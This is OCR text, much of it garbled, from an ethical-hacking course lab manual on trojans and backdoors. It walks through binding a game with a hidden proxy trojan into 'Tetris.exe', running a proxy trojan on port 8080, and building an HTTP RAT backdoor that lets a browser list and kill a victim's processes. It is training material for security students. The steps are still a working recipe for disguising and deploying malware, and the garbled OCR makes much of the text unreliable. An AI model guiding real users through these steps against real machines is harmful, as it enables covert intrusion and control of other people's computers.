w h a t i s 1 1 1 d i e l a b , b u t d i e a c t u a l p r o c e s s o f c o n n e c t i n g t o d i e s e r v e r a n d a c c e s s i n g

d i e p r o c e s s e s i s s a m e a s s h o w n 1 1 1 d i i s l a b .

L a b T a s k s

1 . I n s t a l l OneFileEXEMaker o n Windows Server 2008 V i r t u a l M a c h i n e .

S e n n a S p y O ne EXE M a k e r 2000 2 .0a

Senna Sp y One E X E Maker 2000 - 2.0a

IC Q U IN 3 9 7 3 9 2 7

Official Website: http://sennaspy.tsx orge-m ail: se n n a _ s p y 0 h o lm a 1l.com

Jo in m any files a n d m a k e a u n iq u e E X E file .

T h is p io g ram a llo w io in all k in d of files: e x e , d ll. o c x . tx t . jp g . bmp

A u to m a tic O C X f ile reg is te r a n d P a c k file s support

W in d o w s 9x . N T a n d 2 0 0 0 c o m p a tib le !

10 p e n M o d e | C opy T o | A c tio nP a ram etersS h o rt F ile N am e

r Pack Fies?Action---C Open/Execute C Copy Only

Copy To---(“ Windows C System C Temp C Root

Open ModeC Normal C Maximized C Minimized C Hide

Command Line Parameters.

C opyrigh t (C ). 1 9 9 8 -2 0 0 0 . By S e n n a S pymF I G U R E 3 .1 : O n e F i l e E X E M a k e r H o m e s c re e n

H TAS K 1

OneFile EXE Maker



http://sennaspy.tsx


C l i c k d i e Add File b u t t o n a n d b r o w s e t o t h e C E H - T o o l s f o l d e r a t d i e

l o c a t i o n Z:\CEHv8 Module 06 Trojans and Backdoors\Games\Tetris a n d

a d d t h e Lazaris.exe l i l e .

S e n n a S p y O ne EXE M a k e r 2000 - 2 .0a

Senna Sp y One E X E Maker 2000 - 2.0aOfficial Website: http://sennaspy tsx org

IC Q U IN 3 9 7 3 9 2 7e-m ail: s e n n a _ s p y @ h o tm a 1l.com

J o in m any file s a n d m a k e a u n iq u e E X E file .

T h is program a llo w jo in all k in d o f files: e x e . d ll. o c x . tx t . jp g . bm p .

A u to m a tic O C X f ile re g is te r a n d P a c k file s support


[s h o r t F ile N a m e |P a ra m e te rs |0 p e n M o d e |C o p y T o | A c tio n ! Add F ie

L A Z A R IS .E X E H id e S ystem | O p e n /E x e c u te 1Getete

Save

Ejj*

( • Open/Execute C Copy On|y

Open Mode Copy T 0-------C Normal C Windowsr Maximized (* SystemC Minimized C TempHide ־5) C Root

Command Line Parameters

C opyrigh t (C ). 1 9 9 8 -2 0 0 0 . By S e n n a S py

le s s ! Y o u c a n s e t v a r io u s

t o o l o p t io n s a s O p e n m o d e , C o p y t o , A c t i o n

F I G U R E 3 .2 : A d d in g L a z a r is g a m e

3 . C l i c k Add File a n d b r o w s e t o t h e C E H - T o o l s f o l d e r a t d i e l o c a t i o n

Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans a n d a d d d i e mcafee.exe f i l e .

Senna Sp y One E X E Maker 2000 - 2.0aOfficial Website: http://sennaspy.tsx.org

IC Q U IN 3 9 7 3 9 2 7e-m ail: se n n a _ s p y @ h o tm a il.c o m


Th is program a llo w jo in all k in d o f files: e x e . d ll. o c x . tx t . jp g . bmp


W in d o w s 9x . N T a n d 2 0 0 0 c o m p a tib le I

Add F ie| O p e n M o d e | C opy T o |A c tio nP a ram etersS hort F ile N am e

deleteO p e n /E x e c u teS ystem

Save

r P a ckF ies?

I S y stem | O p e n /E x e c u te

Action---(• Operv׳Execute C Copy Only

Open Mode Copy To!-------C Normal C WindowsC Maximized (* SystemC Minimized Temp ׳(* Hide C Root




F I G U R E 3 .3 : A d d in g M C A F E E . E X E p r o x y s e rv e r

4 . S e l e c t Mcafee a n d t y p e 80801 1 1 d i e Command Line Parameters f i e l d .



http://sennaspy


http://sennaspy.tsx.org



S e n n a S p y O ne EXE M a k e r 2000 2.0a

Senna Sp y One E X E Maker 2000 2.0 ־aOfficial Website http ://sennaspy.tsx org

e-m ail: se n n a _ s p y @ h o tm a il.c o m IC Q U IN : 3 9 7 3 9 2 7


Th is p io g ram a llo w !oin all k in d o f files: e x e . d ll. o c x . tx t . jp g . bmp

A u to m a tic O C X f ile !e g is te i a n d P a c k file s support


A c tio nO p e n M o d e C opy T oP a ia m e te rsS h o rt F ile N am e

O p e n /E x e c u te

O p e n /E x e c u te

System

Save

Open/Execute י“ P * k F te s ?

C Copy On|y

To-------C Windows (* System

Temp C Root

Open Mode— Copy C Normal C Maximized C Minimized ^ Hide

L A Z A R IS .E X E

Command Line Parameters:


F I G U R E 3 .4 : A s s ig n in g p o r t 8 0 8 0 to M C A F E E

S e l e c t Lazaris a n d c h e c k d i e Normal o p t i o n i n Open Mode.5.S e n n a S p y O ne EXE M a k e r 2000 2 .0a

Senna Sp y One E X E Maker 2000 2.0 ־aOfficial Website: http ://sennaspy tsx org

IC Q U IN 3 9 /3 9 2 7e-m ail: se n n a _ s p y @ h o tm a il.c o m


Th is p io g ram a llo w jo in all k in d o f files: e x e . d ll. o c x . tx t . ip g . bm p ...


W in d o w s 9 x . N T a n d 2 0 0 0 c o m p a tib le !

Add F ie

Delete

SaveExit

L A Z A R IS .E X E N o tm a l (S ys tem I O p e n /E x e c u te I

M C A F E E EX E 8 0 8 0 H id e S ystem O p e n /E x e c u te

r Pack Fies?Action(• Operv׳Execute C Copy On|y

Copy To-------C Windows <• System C Temp C Root

Open Mode

Maximize. Jaximized 1״™p.01 :־׳C Minimized C Hide


^ © 2 C opyrigh t (C ). 1 9 9 8 2 0 0 0 . By S e n n a S py

F I G U R E 3 .5 : S e t t in g L a z a r is o p e n m o d e

6 . C l i c k Save a n d b r o w s e t o s a v e d i e d i e o n t h e d e s k t o p , a n d n a m e d i e t i l e

Tetris.exe.






Save n | K ₪ ® a ־ 2] 0־ נ

1 Name *■ I - I Size 1*1 Type 1 *1 Date modified 1

9/18 /20 12 2:31 Af

9 /18 /20 12 2:30 AT

_ l ±1

1 KB Shortcut

2 KB Shortcut

Pubk : ■ Computer

® N e tw o rk

® M o z ia F r e fb x

£ Google Chrome

e-m ail: s e n n a s

|t * H |------- Save------- 1

(Executables (*.exe) _^J Cancel |

S hort F ile N am e

M C A F E E .E X E

Save

r Pack Fies?(• Open/Execute C Copy 0n|y

Open Mode Copy ToC Windows (* System (" Temp C Root

(• Normal C Maximized C Minimized C Hide

r

L־


F I G U R E 3 .6 : T r o j a i i c r e a te d

7 . N o w d o u b l e - c l i c k t o o p e n d i e Tetris.exe f i l e . T l i i s w i l l l a u n c h d i e L a z a r i sm M C A F E E . E X E w i l l , ,

r u n i n b a c k g r o u n d g a m € > 0 1 1 t h e t r 0 1 1 t e ״ d •

F I G U R E 3 .7 : L a 2a ris g a m e

8 . N o w o p e n Task Manager a n d c l i c k d i e Processes t a b t o c h e c k i t McAfee i s m n n i n g .




ס^ [*[File Options View Help

Applications Processes j Services | Perform ance j Networking | Users |

Im a g e . . . 1 User Name 1[ c p u ] Memory (. .. | Description |

csrss.exe SYSTEM 00 1.464K Client Se r. .. 1

csrss.exe SYSTEM 00 1.736K Client S e r...

dwm .exe Admlnist... 00 1,200 K D esk top ...

explorer.exe Admmist.. . 00 14,804 K W indows . . .

LA ZA R IS .EX E .. . Admlnist... 00 1.540K LA ZA R IS

Isass.exe SYSTEM 00 3,100 K Local Se cu ... -

Ism. exe SYSTEM 00 1.384K Local Se ss ...

1 M C A FEE .EXE .. . A d m n st... 00 580 K M CAFEE

msdtc.exe NETYVO... 00 2 .832K MS DTCco...

Screenpresso... . Adminlst... 00 28.380K Screenpre ...

services.exe SYSTEM 00 1.992K Services a .. .

SLsvc.exe NETV/O... 00 6 .748K M icro so ft...

sm ss.exe SYSTEM 00 304 K W indows ...

spoolsv.exe SYSTEM 00 3 .588K Spooler S . . .

svchost.exe SYSTEM 00 13,508 K H o s tP ro c ...

svchost.exe LOCAL ... 00 3.648 K H o s tP ro c ... ■

I * Show processes from all users gnc| process

|jPro :esses: 40 CPU Usage: 2°.׳c Physical Memory: 43°.׳c

F I G U R E 3 .8 : M C A F E E in T a s k m a n a g e r


A n a l y z e a n d d o c u m e n t t h e r e s u l t s r e l a t e d t o d i e l a b e x e r c i s e . G i v e y o u r o p i n i o n o n

y o u r t a r g e t ’ s s e c u n t y p o s t u r e a n d e x p o s u r e t h r o u g h p u b l i c a n d f r e e i n f o r m a t i o n .

O Windows Task M anager

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONSRELATED TO THIS LAB.

T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d

E X E M a k e r O u t p u t : U s i n g a b a c k d o o r e x e c u t e Tetris.exe

Q u e s t io n s1 . U s e v a r i o u s o t h e r o p t i o n s f o r d i e O p e n m o d e , C o p y t o , A c t i o n s e c t i o n s o f

O n e F i l e E X E M a k e r a n d a n a l y z e t h e r e s u l t s .

2 . H o w y o u w i l l s e c u r e y o u r c o m p u t e r f r o m O n e F i l e E X E M a k e r a t t a c k s ?

C E H Lab M anual Page 444 Eth ica l H acking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Stricdy Prohibited.


I n t e r n e t C o n n e c t i o n R e q u i r e d

□ Y e s

P l a t f o r m S u p p o r t e d

0 C l a s s r o o m

0 N o

0 i L a b s




P r o x y S e r v e r T r o j a n

A . Trojan is a program th a t contains m alicious or harm ful code inside apparently harm less program m ing or data in such a way th a t i t can get control and cause damage, such as m ining the file allocation table on a hard drive.






T h e o b j e c t i v e o f t i n s l a b i s t o h e l p s t u d e n t s l e a r n t o d e t e c t T r o j a n a n d b a c k d o o r

a t t a c k s .

T h e o b j e c t i v e s o f t i n s l a b i n c l u d e :

• S t a r t i n g M c A f e e P r o x y

• A c c e s s i n g t h e I n t e r n e t u s i n g M c A l e e P r o x y


T o c a r r y o u t t i n s , y o u n e e d :

■ McAfee T r o j a n l o c a t e d a t D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans

■ A c o m p u t e r m n n i n g Window Server 2012 ( h o s t )

■ Windows Server 2008 m n n i n g i n v i r t u a l m a c h i n e

■ I f y o u d e c i d e t o d o w n l o a d t h e latest version, t h e n s c r e e n s h o t s s h o w n

1 1 1 t h e l a b m i g h t d i f f e r

י Y o u n e e d a w e b b r o w s e r t o a c c e s s I n t e r n e t

י A d m i n i s t r a t i v e p r i v i l e g e s t o r u n t o o l s


T i m e : 2 0 M i n u t e s

I CON KEY

P~/ Valuableinformation

Test vom׳knowledge

— Web exercise

m Workbook review

JT Tools demonstrated in this lab are available in D:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors





A T r o j a n i s a p r o g r a m t h a t c o n t a i n s malicious 0 1 h ־ a r m f u l c o d e i n s i d e a p p a r e n t l y

h a r m l e s s p r o g r a m m i n g o r d a t a i n s u c h a w a y t h a t i t c a n get control a n d c a u s e

d a m a g e , s u c h a s r u i n i n g d i e h i e a l l o c a t i o n t a b l e 0 1 1 a h a r d d r i v e .

Note: T h e v e r s i o n s o f t h e c r e a t e d c c l i e n t o r h o s t a n d a p p e a r a n c e m a y d i f f e r f r o m

w h a t i t i s 1 1 1 d i e l a b , b u t d i e a c t u a l p r o c e s s o f c o n n e c t i n g t o d i e s e r v e r a n d a c c e s s i n g

d i e p r o c e s s e s i s s a m e a s s h o w n 1 1 1 d i i s l a b .

L a b T a s k s£ TASK

Proxy server - 1 . I n W i n d o w s S e r v e r 2 0 0 8 V i r t u a l M a c h i n e , n a v i g a t e t o Z:\CEHv8Mcafee Module 06 Trojans and Backdoors\Trojans Types, a n d r i g h t - c l i c k

Proxy Server Trojans a n d s e l e c t CmdHere f r o m d i e c o n t e x t m e n u .

j r a C > |i■ * CD-v3'־teduc05Tro:o־««nd30ccdo0f3 - "rojanaTypes

Pit Edt view Toos ndp

Orgsncc » Vca־s * S ' s ® ״1 ' w

F Nn״• - - C*»nodri«d M Tvp# M Sat M

pi Documents £ Picture*^ Mjflic

« tore•־

j , Bt*d©«rry T'OJjn J ( T'0j*tk ,Jf Canrund 5h*l "rajjin* J j D*tac«׳rwntT0׳|an«J f Destruetve Trojans J t awnonc Trojans

Folders ׳יי J i Reosrv Mon tor _±_ | . Startup P'cgfarr* W

JA ־ rojansT/pes3ladd>e־ry Trojan

JtE-f'd l r3:3rs Jk F T Tro» r J t G J: Trojars JlMTPh-TTFST'Ojans JtlOPBdCW oo־ j.MACOSXTtoaTS

COer| . Comrrand Srel Trt R=nctc A<j. 3ef3GemertTro;a• ( . 3estrjc&'/e “ rojor J . EbankirgT-qjarts 1 . Trojors

J t VMC ־raja

R»stora previOLS versions

SerdTo ►

i . '^PT'cjon i . SUIT'ojans L. -TIP t-rr־P5 Tro;a I , :CKPBdCkdCOr

QitC30V

C׳eare9xjrtcjtDelete

Proxy Se־ver Troji Jg \\ 35PtOtv TrQ*

Rename

Prooenes- .. t i n m i G H :־ ־־ .

F I G U R E 4.1: W in d o w s S e rv e r 2008: C m d H e r e

2 . N o w t y p e d i e c o m m a n d dir t o c h e c k f o r f o l d e r c o n t e n t s .

F I G U R E 4 .2 : D i r e c t o r y l is t in g o f P r o x y S e r v e r fo ld e r

3 . T h e f o l l o w i n g i m a g e l i s t s d i e d i r e c t o r i e s a n d f i l e s 1 1 1 t h e f o l d e r .



M odule 06 - T ro jans and B ack d o o rs

x |ם1-|Z:\CEHv8 Module 06 Trojans and BackdoorsSTrojans Types\Proxy Server Trojans>dir I Uolune in drive Z has no label.I Uolune Serial Number is 1677-7DACI Directory of Z:\CEHv8 Module 06 Trojans and BackdoorsVTrojans Types\Proxy Serve Ir Trojans109/19/2012 01:07 AM <DIR>109/19/2012 01:07 AM <DIR>102/17/2006 11:43 AM 5,328 ncafee.exe109/19/2012 01:07 AM <DIR> W3bPr0xy Tr0j4nCr34t0r <Funny Nane>1 File<s> 5,328 bytes1 rile^s; b,J28 bytes3 Dir<s> 208,287,793,152 bytes freeZ:\CEHv8 Module 06 Trojans and BackdoorsSTrojans Types\Proxy Server Trojans>—

mFIGURE 4.3: Contents in Proxy Server folder

Type die command m cafee 8080 to m il the service 111 W indows Server 2008.

FIGURE 4.4: Starting mcafee tool on port 8080

5. The service lias started 011 port 8080.

6. Now go to Windows Server 2012 host machine and configure the web browser to access die Internet 011 port 8080.

7. 111 diis lab launch Clirom e, and select Settings as shown 111 die following figure.

Q 2 wwwgoogtorofv ■

* C.pjico* • Olo*r

XjnaNCMm-

G o o g l e

11׳-■w״n•״• ...

m Tliis process can be attained in any browser after setting die LAN settings for die respective browser

FIGURE 4.5: Internet option of a browser in Windows Server 2012



8 . Click the Show advanced settings 1111k to view the Internet settings.


FIGURE 4.6: Advanced Settings of Chrome Browser

9. 111 Network Settings, click Change proxy settings.

C 0 c hr cyncv/dVOflM.'Mtt npt/

I Clvotue Settings

4 Enitoir AutaM tc M Ml *«D tom n * u«9« c»rt. VUu)tAdofl1<nflf(

MttmericfocgkOvcmt is u9ncy»<» compute ;s>tt«rnpo*>s«rtnastccon>1ectc the r<t>>o<fc.| OwypwstBnjt-

it (UQM thjt w«n> r 1 l*nju*9« I wDownoads

Covmlaad kcabot: C.'lherrAi rnncti rt0AT0T 1to><iU Ast »hw 10 mt «Kt! lit Mm dw»«10><«9

MTTPS/SM.

FIGURE 4.7: Changing proxy settings of Chrome Browser

10. 111 die Internet Properties window click LAN settings to configure proxy settings.




Internet Properties

General [ Security ] Privacy ] Content Connections | Programs ] Advanced

SetupTo set up an Internet connection, dick Setup.

Dial-up and Virtual Private Network settings

Sgt default

Choose Settings if you need to configure a proxy server for a connection.

(•) Never cfal a connectionO Dial whenever a network connection is not present O Always dal my default connection

Current None

Local Area Network (LAN) settings -------------------------------------------------

LAN Settings do not apply to dial-up connections. | LAN settings | Choose Settings above for dial-up settings.

OK ] | Cancel J ftpply

FIGURE 4.8: LAN Settings of a Chrome Browser

11. 111 die Local Area Network (LAN) Settings window, select die Use a proxy server for your LAN option 111 the Proxy server section.

12. Enter die IP address o f W indows Server 2008, set die port number to 8080, and click OK.

Local Area Network (LAN) SettingsFTAutomatic configuration

Automatic configuration may override manual settings. To ensure the use of manual settings, disable automatic configuration.

@ Automatically detect settings

ח Use automatic configuration script

Address

Proxy server

Use a proxy server for your LAN (These settings will not apply to dial-up or VPN connections).

Address: Advanced8080Port:10.0.0.13

I I Bypass proxy server far local addresses!

CancelOK

FIGURE 4.9: Proxy settings of LAN in Chrome Browser

13. Now access any web page 111 die browser (example: www.bbc.co.uk).



http://www.bbc.co.uk


FIGURE 4.10: Accessing web page using proxy server

14. The web page w ill open.

15. Now go back to Windows Server 2008 and check die command prompt.

A d m in istra to r C:\W mdow* \s y *te m 3 2 \c m d .e x e - m ca fee 8 0 8 0

/conplete/search?sugexp=chrome,nod=188tc lient s־chrone8rhl=en1200: www.google.co : /conplete/search?sugexp=chrome,nod=18&client =chrone8rhl=er-|US8rq=bbc.co. ■Accepting New Requests 1200: www.google.co l~US&q=bbc.co.u !Accepting New Requests !Accepting New Requests ■ * * ־ ^Accepting New Reque 1200: www.google .co /conplete/search?sugexp=chroroe,nod=188tc lient =chrone8thl=erl-US&a=bbc.co.uk 1301: bbc.co.uk: / |

■H c c e p t i n g N ew Kequests ■Accepting New Requests 1200: www.bbc.co.uk: / !Accepting New Requests ■Accepting New Requests !Accepting New Requests !Accepting New Requests ■Accepting New Requests !Accepting New Requests !Accepting New Requests !200: static .bbci.co.uk: /franeworks/barlesque/2.10.0/desktop/3.5/style/r*ain.css■Accepting New Requests !200: static.bbci.co.uk: /bbcdotcon/0.3 .136/style/3pt_ads .css ____________________________________________!Accepting New Requests

m Accessing web page using proxy server

FIGURE 4.11: Background information on Proxy server

16. You can see diat we had accessed die Internet using die proxy server Trojan.

L a b A n a ly s is

Analyze and document die results related to die lab exercise. G ive your opinion on your target’s security posture and exposure dirough public and tree information.



http://www.google.co

http://www.google.co

http://www.google



P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B .

T o o l/ U tility In form ation C o llected /O b jectives A ch ieved

Proxy Server T ro jan

O utput: Use the proxy server Trojan to access the InternetAccessed webpage: www.bbc.co.uk

Q u e s t io n s1. Determine whether M cAfee H T T P Proxy Server Trojan supports other

ports that are also apart from 8080.

2. Evaluate the drawbacks o f using the H T T P proxy server Trojan to access the Internet.

□ N o

In tern et C onnection Requ ired

0 Yes

Platfo rm Supported

□ !Labs0 C lassroom





H T T P T r o j a n

A . T ro ja n is a p ro g ram th a t co n ta in s m a lic io u s o r h a rm fu l code in s id e a p p a re n tly

h arm le ss p ro g ram m in g o r d a ta in such a lra y th a t it can g e t c o n tro l a n d cause

dam age, such a s m in in g th e f ile a llo c a tio n ta b le on a h a rd d riv e .

L a b S c e n a r io

Hackers have a variety ot motives for installing m alevolent software (m alware). This types o f software tends to vield instant access to the system to continuously steal various types o f inform ation from it, for example, strategic company’s designs 01־ numbers o f credit cards. A backdoor is a program or a set o f related programs that a hacker installs 011 the victim computer to allow access to the system at a later time. A backdoor’s goal is to remove the evidence o f in itial entry from the systems log. Hacker—dedicated websites give examples o f many tools that serve to install backdoors, w ith the difference that once a connection is established the intruder must log 111 by entering a predefined password.

You are a Security Adm inistrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuable data from the network, and identity theft.

L a b O b je c t iv e s

The objective o f tins lab is to help students learn to detect Trojan and backdoor attacks.

The objectives o f the lab include:

• To run H T T P Trojan 011 W indows Server 2008

• Access the W indows Server 2008 machine process list using the H T T P Proxy

• K ill running processes 011 W indows Server 2008 V irtual Machine

L a b E n v ir o n m e n t

To carry out diis, you need:

I CON KEY

/' V a lu a b le in fo rm a tio n

S T e s t y o u rk n o w l e d g e ____________

* W e b ex erc ise

£ Q ! W o rk b o o k re v ie w

H Tools demonstrated in this lab are availab le in D:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors




HTTP RAT located at D:\CEH-Tools\CEHv8 Module 06 Trojans and יBackdoors\Trojans Types\HTTP H TTPS Trojans\HTTP RAT TRO JAN

■ A computer running Window Server 2008 (host)

■ Windows 8 running 111 Virtual Machine

■ W indows Server 2008 111 Virtual Machine

■ I f you decide to download the la test version, then screenshots shown in the lab m ight differ

■ You need a web browser to access Internet

■ Adm inistrative privileges to run tools


Time: 20 Minutes

O v e r v ie w o f T r o ja n s a n d B a c k d o o r s

A Trojan is a program that contains m alicious or harmful code inside apparently harmless programming or data 111 such a way diat it can get control and cause damage, such as ruining die file allocation table on a hard dnve.

Note: The versions o f die created client or host and appearance may differ from what it is 111 die lab, but die actual process o f connecting to die server and accessing die processes is same as shown 111 diis lab.

L a b T a s k s

1. Log 111 to Windows 8 Virtual Machine, and select die Start menu by hovering die mouse cursor on die lower-left corner of die desktop,

uRtcytlt Dm

a *Mo»itlafirefox

GoogleChremr

Windows 8 Release Previev.ז<■׳8ח Evaluation copy Build 840C

FIGURE 5.1: Windows 8 Start menu

2. Click Services ui the Start menu to launch Services.

HTTP RAT




S ta r t

m

Video

m

GoogleChrome

9

.................י5י 4WeaOier

*

MozillaFirefox

services

< 3 ,

m

CalendarB

Intonei Explorer

rm

■

Slcfe

m a S

OcBktop Uapt SfcyDrwe

>PP1:1 ■ :h e \\" u '.a ^

Wide Web Publisher ismandatory as HTTP RAT FIGURE 5.2: Windows 8 Start menu Appsruns on port 80 _ . , , _3. Disable/Stop World W ide Web Publishing Services.

File Action View Hdp

+1H1a m 0 ebi »Services ; lo c a l)

Name Description Status Startup Type Log A

Windows Firewall ־34 Windows F1._ Running Automatic LocWindows Font Cache Service Optimizes p... Running Automatic LocWindows Image Acquisitio... Provides im... Manu3lWindows Installer Adds, modi... Menusl Loc

V Windows Management Inst.. Provides a c... Running Automatic LOC•^Windows Media Player Net... Shares Win... Manual Net־ W indow s Modules Installer Enables inst... Manual£$ V/indows Process Activatio... TheWindo... Running Manual$£׳ Windows Remote Manage... Windows R... Menusl Net

Windows Search Provides CO.- Running Automatic (D._ LocWindows Store Service (W5... Provides inf... Menjsl (Tng... LOCWindows Tim# Maintains d... Manual (Tng.. Loc

Q Windows Update Enables the... Manual (Tng... Loc*%W'1nHTTP Web Proxy Auto ... WinHTTP i... Running Menusl Loc3% Wired AutoConfig The Wired... Manual L0C'•& WLAN AutoConfig The WLANS... Menual LOC■I^WM Performance Adapter Provide; p#.. Manual loc

Workstation Cr«at«c and... Running Automatic NttP I World Wide Web Publnhin... Provide! W... Running Menusl u M

. WWAN AutoConfig This service . . Menual L0C v< >

World Wide Web Pubbhng Service

Description:Provides Web comectr/rty and admin straton through the Interret Inf emotion Services Manager

\ Mended ^Standard/

FIGURE 5.3: Administrative tools -> Services Window

4. Right-click the World W ide Web Publishing service and select Properties to disable the service.




World Wide Web Publishing Service Properties (Local...Genera1 Log On Recovery Dependencies

Service name: W3SVC

Display name: World Wide Web Publishing Service

ivides Web connectivity and administration 5ugh the Internet Information Services ManagerDescription:

Path to executable:C:\Windows\system32\svchost.exe -k iissvcs

DisabledStartup type:

Helo me configure service startup options.

Service status: Stopped

ResumePauseStopStart

You can specify the start parameters that apply when you start the service from here

Start parameters

ApplyCancelOK

FIGURE 5.4: Disable/Stop World Wide Web publishing services

5. N ow start H T T P R A T from die location Z:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN.

HTTP RAT 0.31□

r V ' k H T T P R A Tf -W !b ackd o o r W eb server

J by zOmbie?J

latest version here: [http://freenet.am/~zombie]וsettings

W send notification with ip address to mail SMTP server 4 sending mail u can specify several servers delimited with ;smtp. mail. ru;some. other, smtp. server;

your email address: |[email protected]

server port: [80"

Exit

I. com

close FireWalls

Create

IUUI The send notification option can be used to send the details to your Mail ID

FIGURE 5.5: HTTP RAT main window

6. Disable die Send notification w ith ip address to mail opdon.

7. Click Create to create a httpserver.exe hie.



http://freenet.am/~zombie


□ HTTP RAT 0.31 E l l

/ V K H T T P R A TI ^kackdoor Webserverif■• T J hy 20mbie v0.31

. 1latest version here: [http://freenet.am/~zombie]

seiuriyssend notification with ip address to mail|

SMTP server 4 sending mail u can specify several servers delimited with ;| smtp. mail. ru;some. other, smtp. server; your email address:|y [email protected]

close FireWalls server port: 180

| i Create j| ־ Exit__

FIGURE 5.6: Create backdoor

HTTP RAT 0.31

/ V \ H T T P R A TI -W backdoor Webserver

done!

donesend httpserver.exe 2 victim

OK

la

rc

|y [email protected]

w close FireWalls server pork:[

Create Exit

FIGURE 7.כ: Backdoor server created successfully

8. The httpserver.exe tile should be created 111 die folder Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TRO JAN

9. Double-click die tile to and click Run.

02 The created httpserver will be placed in the tool directory



http://freenet.am/~zombie




HTTP RAT TROJAN

EE s««t >11Select aone ״ח

<t) History □ D Inrert <elert10n

Application Tool*

Momgc

* SI Open י0 Edit

BQ New item י Easy access יIS □ * "Im-J Cod/ path

O pen File ־ S ecurity W arn in g

The publisher could not bp verified. Are you dire you want to run thk software?[gj ה־ Name ...TTP HTTPS Trojans\HTTP RAT TROJAN\httpservcr.cxc

Publisher: Unknown Publisher ־־Type ApplicationFrom: Z:\CEHv8 Module06 Trojans and Backdoors JrojansT״

CancelRun

This file docs not have ג valid digital signature that verifies its ^ 3 . publisher. You should only run software from publishers you trustHew can I deride what toftivare to mn?

[3 P«te <harcut to* to • Clipboard | 01

I « HITPHTIPS Trojans >o ®N3me

Z ittpiat| htlpscfvcr |

1 . readme

Favorites

■ Desktop

4 Downloads

*S&l Recent places

^ Libraries

1111 Documents

Music

B Pictures

g£ Videos

Homegroup

T® Computer i l . Local Oslr (C:) .CEH-Tcols (\\10 ׳-4Ip Admin (admin-p

4 items 1 item selected iO.: KB

FIGURE 5.8: Running the Backdoor

10. Go to Task Manager and check if die process is running.

File Options View

Processes Performance App history Startup Users Details Services

Name Status

3 0 %CPU

5 2 %M e m o ry

4 % 0 %Disk N etw ork

A p p s (2 )

> Task Manager 1.9% 6.8 MB 0 MB/s 0 Mbps

> ^ Windows Explorer 0% 25.1 MB 0.1 MB/s 0 Mbps

B a c k g ro u n d p ro c e s s e s (9 )

H Device Association Framework... 0% 3.3 MB 0 MB/s 0 Mbps

S I Httpserver (32 bit) 0% 1.2 MB 0 MB/s 0 Mbps

Microsoft Windows Search Inde... 0% 4.9 MB 0 MB/s 0 Mbps

tflf' Print driver host for applications 0% 1.0 MB 0 MB/s 0 Mbps

m Snagit (32 bit) 19.7% 22.4 MB 0.1 MB/s 0 Mbps

j[/) Snagit Editor (32 bit) 0% 19.2 MB 0 MB/s 0 Mbps

l i l Snagit RPC Helper (32 bit) 1.7% 0.9 MB 0 MB/s 0 Mbps

t> OR) Spooler SubSystem App 0% 1.5 MB 0 MB/s 0 Mbps

0 TechSmith HTML Help Helper (... 0% 0.8 MB 0 MB/s 0 Mbps

W i n d o : .־;•.׳ v f f '־-־’ r־ ,־ ׳~ :

( * ) Fewer details

FIGURE 5.9: Backdoor running in task manager

11. Go to W indows Server 2008 and open a web browser to access die W indows 8 machine (here “ 10.0.0.12” is die IP address ot W indows 8 Machine).




*Drabe'S KTTP RAT

c | I £ « iooale P ״ ] * D -

w elcom e 2 IITTP_RAT infected com puter }:]

.es] [brov!6«] [comouter info] [stoo httorat] [have auaaestions?] [homeoace]

wplrnm e } : J

FIGURE 5.10: Access the backdoor in Host web browser

12. Click running processes to list the processes running on die Windows 8 machine.

P A E -C ? 1 ioojle ־

running processez:

Z>nbe's HTTP_RAT

1,4■ & 10.0.0. iZQfOC______

system Process]] S/stem I kill]

srrss.exe [kill] [M]!v*‘ninit.exe fkilll[M]!w1nlogon.exe fkilll services.exe f kill]

lsass.exe [ki]!! ;vchoctoxa r1<11n:vcho5t.exe f

svchostexe f kilfl dvirr.exe Ik illl

svchostexe [kill] evehoct.axa [MID

:vchost.cxa [UdD svchostexe [hjjj]

spoolsv.exe [kilfl svchostexe | kill) svchostexe [kill]

d3cHoct.ova f l-illlMsMpCng.exe fk illl

*vc.hus»t.«x« fkilll svchostexe fkilll 5vchost.exe [ kiTTj ta«kh(>*t.*x» [kill]

bckhoct.sxo [ ]יי-[Mpkxar.tM [M 1

search indexer.exe fkilfl S>n«g1t32.ex• [jo j] TscHelp.exe [kill] SnagPri./.•** [kill]

SragitCditor.exe [ !:ill] aplmjv164.exe f kill] svchostexe fkilll

httpserver.exe (kill] Taskmor.«*x® [kill]

[firofox O.XO [UJJ

FIGURE 5.11: Process list of die victim computer

13. You can kill any running processes from here.

L a b A n a ly s is

Analyze and document die results related to die lab exercise. G ive your opinion on your target’s security posture and exposure dirough public and free mformadon.





T o o l/ U tility In fo rm ation C o llected /O b jectives A ch ieved

Successful send httpserver.exe 011 victim machine

O utput: K illed ProcessSystemsmss.execsrss.exe

H T T P T ro jan winlogon.exeserv1ces.exelsass.exesvchost.exedwm.exesplwow64.exehttpserver.exefirefow.exe

Q u e s t io n s1. Determine the ports that H T T P proxy server Trojan uses to communicate.

In ternet C onnection Requ ired

□ Yes 0 N o

Platfo rm Supported

0 C lassroom 0 iLabs




R e m o t e A c c e s s T r o j a n s U s i n g

A t e l i e r W e b R e m o t e C o m m a n d e r

.4 T ro ja n is a p ro g ram th a t co n ta in s m a lic io u s o r h a rm fu l code in s id e a p p a re n tly

h arm le ss p ro g ram m in g o r d a ta in such a 1r a j th a t it can g e t c o n tro l a n d cause

dam age, such a s m in in g th e f ile a llo c a tio n ta b le on a h a rd d riv e .


